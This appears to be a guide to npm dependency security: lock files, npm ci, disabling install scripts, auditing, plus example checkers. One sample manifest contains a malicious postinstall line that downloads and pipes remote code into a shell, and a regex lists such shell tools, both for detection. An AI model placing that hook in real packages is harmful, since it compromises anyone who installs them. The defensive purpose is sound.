N. P. O'Donnell, 2020
- NPM website: npmjs.org
The `package-lock.json` is generated during `npm i` and should be included in source control. Its purpose is to pin every direct and transitive dependency at an exact version, together with the resolved tarball URL and an integrity hash for each, so that builds are deterministic.

Changing the version of a package in `package.json` such that it goes out of sync with `package-lock.json` will cause `npm i` to resolve the new range, install whatever currently satisfies it, and rewrite `package-lock.json` to match, so the lock file no longer guarantees what gets installed. This is a security concern. To prevent it, run `npm ci` instead of `npm i`. This deletes the `node_modules` folder and installs dependencies strictly from `package-lock.json`. The install fails if `package-lock.json` is missing or if any inconsistency is detected between `package-lock.json` and `package.json`. Unlike `npm i`, `npm ci` never modifies `package-lock.json`.
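The consistency check that `npm ci` enforces can be illustrated with a small script. The following is an added example, not code from the original article or from npm itself: it compares the dependency ranges declared in a `package.json` against the versions pinned under `packages` in a lockfileVersion 2/3 `package-lock.json`, and reports every direct dependency whose lock entry is missing or out of range. It handles only exact versions and `^`/`~` ranges (no prereleases or compound ranges), and the two documents it checks are constructed sample data.

```javascript
// Added example (not npm's own code): a simplified version of the
// package.json vs. package-lock.json consistency check that npm ci performs.
// Supports exact versions, ^ and ~ ranges only; lockfileVersion 2/3 layout.

function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)$/.exec(v);
  if (!m) throw new Error(`unsupported version: ${v}`);
  return m.slice(1).map(Number);
}

// Lexicographic compare of [major, minor, patch] triples.
function cmp(a, b) {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// True if `version` is allowed by `range` (exact, ^x.y.z or ~x.y.z).
function satisfies(version, range) {
  const v = parseVersion(version);
  const op = range[0] === '^' || range[0] === '~' ? range[0] : '';
  const base = parseVersion(op ? range.slice(1) : range);
  if (!op) return cmp(v, base) === 0;
  if (cmp(v, base) < 0) return false;
  let upper;
  if (op === '~') upper = [base[0], base[1] + 1, 0];          // ~1.2.3 -> <1.3.0
  else if (base[0] > 0) upper = [base[0] + 1, 0, 0];          // ^1.2.3 -> <2.0.0
  else if (base[1] > 0) upper = [0, base[1] + 1, 0];          // ^0.2.3 -> <0.3.0
  else upper = [0, 0, base[2] + 1];                           // ^0.0.3 -> exactly 0.0.3
  return cmp(v, upper) < 0;
}

// Lists each direct dependency whose lock entry is absent or out of range.
function lockMismatches(pkg, lock) {
  const declared = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  const problems = [];
  for (const [name, range] of Object.entries(declared)) {
    const entry = lock.packages && lock.packages[`node_modules/${name}`];
    if (!entry) problems.push(`${name}: not in package-lock.json`);
    else if (!satisfies(entry.version, range))
      problems.push(`${name}: locked ${entry.version} does not satisfy ${range}`);
  }
  return problems;
}

// Constructed sample data: lodash was bumped in package.json after the lock
// was written, and jest was added without updating the lock at all.
const SAMPLE_PKG = {
  dependencies: { lodash: '^4.17.20', express: '~4.18.0' },
  devDependencies: { jest: '^29.0.0' },
};
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { dependencies: { lodash: '^4.17.15', express: '~4.18.0' } },
    'node_modules/lodash': { version: '4.17.15' },
    'node_modules/express': { version: '4.18.2' },
  },
};

for (const p of lockMismatches(SAMPLE_PKG, SAMPLE_LOCK)) console.log(p);
```

Run against the sample data it reports the stale `lodash` pin and the missing `jest` entry, which is exactly the situation in which `npm i` would silently rewrite the lock and `npm ci` would refuse to proceed.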
When installing a package, always pass the `--ignore-scripts` option to prevent its lifecycle scripts from being run. To make this happen by default, update the NPM config:

`npm config set ignore-scripts true`

Note that with this setting npm also skips the `pre` and `post` hooks of scripts you run explicitly (such as `npm test` or `npm run build`), and packages with native addons that depend on an install script will have to be built by hand.

Manually inspect the `package.json` of any new or unknown package, in particular the `preinstall`, `install`, `postinstall` and `prepare` entries under `scripts`, for anything odd before running any NPM commands. There are ways for attackers to have arbitrary scripts run from nothing but an `npm install`. See this video.
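To make the manual inspection above concrete, here is an added example (not code from the original article or from npm) that pulls out the scripts npm would run on its own during an install from a package's `package.json`, flags the ones that fetch from the network or pipe into a shell, and, for whole dependency trees, lists the packages a lockfileVersion 2/3 `package-lock.json` marks with `hasInstallScript`. The package manifest and lock file it reads are constructed sample data; the `example.invalid` host in the sample script is a reserved name, not a real server.

```javascript
// Added example (not npm's own code): find the scripts that run
// automatically during `npm install`, before you run it.

// Lifecycle scripts npm runs without being asked during an install.
// `prepare` also runs for git dependencies and after a local `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Returns { hookName: command } for every install-time hook the package defines.
function installHooks(pkg) {
  const scripts = pkg.scripts || {};
  const found = {};
  for (const hook of INSTALL_HOOKS) if (hook in scripts) found[hook] = scripts[hook];
  return found;
}

// `node-gyp rebuild` is the usual legitimate install script. Anything that
// downloads, decodes or pipes into a shell deserves a manual look.
const SUSPICIOUS = /curl|wget|\bsh\b|bash|eval|base64|https?:\/\//i;

// Names of install-time hooks whose command matches the SUSPICIOUS pattern.
function suspiciousHooks(pkg) {
  return Object.entries(installHooks(pkg))
    .filter(([, cmd]) => SUSPICIOUS.test(cmd))
    .map(([hook]) => hook);
}

// lockfileVersion 2/3 sets hasInstallScript on packages that define
// preinstall/install/postinstall, so the whole tree can be screened offline.
function packagesWithInstallScripts(lock) {
  return Object.entries(lock.packages || {})
    .filter(([path, entry]) => path !== '' && entry.hasInstallScript)
    .map(([path]) => path.replace(/^.*node_modules\//, ''));
}

// Constructed sample manifest: a legitimate native build plus a postinstall
// that fetches and executes remote code (example.invalid is a reserved name).
const HOOK_PKG = {
  name: 'some-package',
  version: '1.0.0',
  scripts: {
    test: 'jest',
    install: 'node-gyp rebuild',
    postinstall: 'curl -s http://example.invalid/x | sh',
  },
};

// Constructed sample lock: two packages carry install scripts, one nested.
const HOOK_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { dependencies: { esbuild: '^0.19.0', lodash: '^4.17.21' } },
    'node_modules/esbuild': { version: '0.19.12', hasInstallScript: true },
    'node_modules/lodash': { version: '4.17.21' },
    'node_modules/chokidar/node_modules/fsevents': { version: '2.3.3', hasInstallScript: true },
  },
};

console.log('install hooks:', installHooks(HOOK_PKG));
console.log('suspicious:', suspiciousHooks(HOOK_PKG));
console.log('tree packages with install scripts:', packagesWithInstallScripts(HOOK_LOCK));
```

To screen a real package before installing it, `npm pack <name>` downloads its tarball without running anything; the `package.json` inside can then be fed to `installHooks`. The regex is a heuristic for triage, not a detector: a reviewer still has to read whatever it flags, and scripts it does not flag.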
When a new major version of a package is released, wait for it to be adopted by the community and for any early issues to be caught before upgrading to it. When updating minor versions for security/bug fixes, run `npm outdated` to see which packages are out of date, and update each package individually. Read the release notes, and ensure you understand the implications of each update.
Use `npm audit` to scan for known security vulnerabilities in your dependencies. It reads the installed tree and `package-lock.json` and queries the registry's advisory database, so run it in CI as well as locally; `npm audit --audit-level=high` makes it exit non-zero only for high or critical findings.